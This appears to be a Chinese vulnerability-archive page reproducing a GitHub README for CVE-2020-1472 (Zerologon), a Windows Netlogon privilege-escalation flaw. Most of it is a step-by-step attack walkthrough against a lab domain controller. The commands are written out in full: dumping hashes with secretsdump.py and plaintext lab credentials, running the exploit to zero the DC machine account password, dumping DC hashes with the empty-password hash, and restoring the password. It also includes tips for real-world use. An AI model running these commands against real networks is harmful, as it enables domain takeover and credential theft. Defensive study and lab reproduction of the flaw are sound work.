POC详情: 0cc66b31cdabb07a2c0a7727f1b2b85bc1124f51

来源
关联漏洞
标题: Microsoft Windows Netlogon 安全特征问题漏洞 (CVE-2020-1472)
描述:Microsoft Windows Netlogon是美国微软(Microsoft)公司的Windows的一个重要组件,主要功能是用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。 Microsoft Windows Netlogon 存在安全漏洞。攻击者可以使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器的易受攻击的 Netlogon 安全通道连接并进行特权提升。
描述
CVE-2020-1472复现流程
介绍
复现完了有点小BUG,重启后会卡在登录页面比较久。不知道是不是只有我会。(谨慎在真实环境利用)
实战中可以使用secretsdump.py 的 -use-vss和-history获取历史hash进行恢复.

第一步

pip3 install -r requirements.txt

查看hash

secretsdump.py molecule-labs.com/administrator:Aa123456.@192.168.175.132 -just-dc-user 'AD$'

![images](https://github.com/NAXG/CVE-2020-1472/blob/master/1.png)

攻击

python3 CVE-2020-1472.py AD AD$ 192.168.175.132

![images](https://github.com/NAXG/CVE-2020-1472/blob/master/2.png)

查询域控hash

secretsdump.py molecule-labs.com/'AD$'@192.168.175.132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

![images](https://github.com/NAXG/CVE-2020-1472/blob/master/3.png)

恢复hash

python3 reinstall_original_pw.py AD 192.168.175.132 061e8e521872fa93a2f8d89ca0683145

![images](https://github.com/NAXG/CVE-2020-1472/blob/master/4.png)

查询恢复后的hash

secretsdump.py molecule-labs.com/administrator:Aa123456.@192.168.175.132 -just-dc-user 'AD$'

![images](https://github.com/NAXG/CVE-2020-1472/blob/master/5.png)

脚本来源
https://github.com/blackarrowsec/redteam-research

https://github.com/dirkjanm/CVE-2020-1472

https://github.com/SecuraBV/CVE-2020-1472
文件快照

[4.0K] /data/pocs/0cc66b31cdabb07a2c0a7727f1b2b85bc1124f51 ├── [128K] 1.png ├── [ 90K] 2.png ├── [124K] 3.png ├── [162K] 4.png ├── [ 83K] 5.png ├── [4.9K] CVE-2020-1472.py ├── [1.3K] README.md ├── [6.4K] reinstall_original_pw.py └── [ 325] requirements.txt 0 directories, 9 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。